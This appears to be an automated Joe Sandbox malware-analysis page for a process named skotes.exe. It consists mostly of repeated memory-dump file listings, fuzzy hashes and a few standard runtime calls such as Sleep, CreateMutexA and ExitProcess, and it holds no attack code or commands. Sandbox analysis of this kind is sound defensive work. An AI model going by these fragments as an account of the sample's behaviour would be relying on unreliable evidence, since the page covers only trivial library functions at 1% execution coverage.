Associated: 00000002.00000002.2243070984.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243125761.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244428735.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244895761.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245003817.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245032950.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245768224.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245837939.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245874233.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245941980.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245990171.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246019735.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246089770.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246138987.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246182523.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246275205.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246311733.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246342921.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246436686.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246464857.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246491680.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246556998.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246582589.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246611059.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246665944.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246696494.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246724193.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246790391.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246817622.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246971678.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247008958.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247106475.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247236759.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247808119.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247884935.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247913050.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247943111.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247968841.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247997624.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248024106.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248052321.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248079383.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 1e9c0538a40f9524158fe998f76355e3b515495a53f43311aa92fe0046296551
Instruction ID: 4707a41b1139a36722ef6fd2bf6e06cdd5d464c32c5a3894ebcb288d7a0206fb
Opcode Fuzzy Hash: 1e9c0538a40f9524158fe998f76355e3b515495a53f43311aa92fe0046296551
Instruction Fuzzy Hash: E4A103B0A00225AFDB10DFA4D945B5BBBF8FF15710F1441A9E819E7241EB39EA14CBE1

Function 00B5CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B5CC66

Memory Dump Source

Source File: 00000002.00000002.2242682301.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000002.00000002.2242665443.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242682301.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242989881.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243010712.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243031373.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243070984.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243125761.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244428735.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244895761.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245003817.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245032950.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245768224.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245837939.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245874233.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245941980.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245990171.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246019735.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246089770.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246138987.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246182523.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246275205.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246311733.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246342921.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246436686.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246464857.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246491680.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246556998.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246582589.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246611059.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246665944.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246696494.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246724193.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246790391.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246817622.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246971678.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247008958.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247106475.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247236759.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247808119.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247884935.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247913050.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247943111.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247968841.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247997624.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248024106.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248052321.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248079383.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: 051be88c314246b39a03a0804e465bda222bde4938d997b6e871e03877dafd82
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: 82B104329043859FDB158F28C8817AEBFF6EF55341F1441EADC55EB281D6349D4ACB90

Function 00B3BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00B3BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 00B3BBE4
_xtime_get.LIBCPMT ref: 00B3BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 00B3BC13

Memory Dump Source

Source File: 00000002.00000002.2242682301.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000002.00000002.2242665443.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242682301.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242989881.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243010712.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243031373.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243070984.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243125761.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244428735.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244895761.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245003817.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245032950.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245768224.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245837939.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245874233.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245941980.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245990171.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246019735.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246089770.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246138987.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246182523.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246275205.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246311733.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246342921.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246436686.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246464857.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246491680.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246556998.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246582589.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246611059.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246665944.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246696494.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246724193.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246790391.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246817622.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246971678.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247008958.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247106475.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247236759.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247808119.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247884935.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247913050.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247943111.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247968841.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247997624.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248024106.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248052321.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248079383.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 474ce5cf2d3abd81c5c2a85ef4179d66ae5e81fffda877eb5a3ce6fa9525a84e
Instruction ID: b8eaf973e389c6ea05cfc3bb2049241c88ba815987ca7a4790556c935f2195b9
Opcode Fuzzy Hash: 474ce5cf2d3abd81c5c2a85ef4179d66ae5e81fffda877eb5a3ce6fa9525a84e
Instruction Fuzzy Hash: 10211071900119AFDF00EBA4D8829BEBBB9EF48710F600055F605B7251DB30AD459B90

Analysis Process: skotes.exePID: 7128, Parent PID: 3148COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1886
Total number of Limit Nodes:	9

Executed Functions

Function 00B5652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00B5652A,?,?,?,?,?,00B57661), ref: 00B56567

Memory Dump Source

Source File: 00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2244938416.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245012498.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245755433.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245823092.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245853653.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245876712.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245943642.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246201542.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246295997.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246329246.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246434770.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246554824.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246579344.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246652100.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246678485.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246711066.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246775095.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246803189.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246853738.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246995361.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247037141.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247149420.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247238708.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247320382.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247540162.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247810360.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247887216.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247917765.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247944442.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247971125.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247998193.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248030654.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248065200.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248089437.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248114089.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248131505.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248156552.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248185867.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248295492.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248322713.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248351516.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248396234.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248425817.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248450896.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248478312.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248506582.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248533616.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 848d673f660a5016be9fc1d748f4ee3b8066170c23f33e8e5f8e0b72ac75ecc5
Instruction ID: 40d7117b306c6dfe0c81c0eb081949d731475c6f96549a275493d55a0ab5cdda
Opcode Fuzzy Hash: 848d673f660a5016be9fc1d748f4ee3b8066170c23f33e8e5f8e0b72ac75ecc5
Instruction Fuzzy Hash: 2BE0863044110CAECE257B18DC09A4C3B99EF3274AF404D80FD0897122DB25FE81C651

Function 00B29BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000003.00000002.2244938416.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245012498.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245755433.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245823092.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245853653.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245876712.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2245943642.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246201542.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246295997.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246329246.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246434770.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246461031.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246554824.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246579344.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246652100.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246678485.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246711066.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246775095.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246803189.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246853738.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2246995361.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247037141.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247149420.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247238708.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247320382.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247540162.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247810360.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247887216.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247917765.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247944442.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247971125.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2247998193.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248030654.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248065200.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248089437.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248114089.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248131505.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248156552.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248185867.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248212796.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248295492.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248322713.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248351516.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248396234.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248425817.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248450896.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2248478312.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
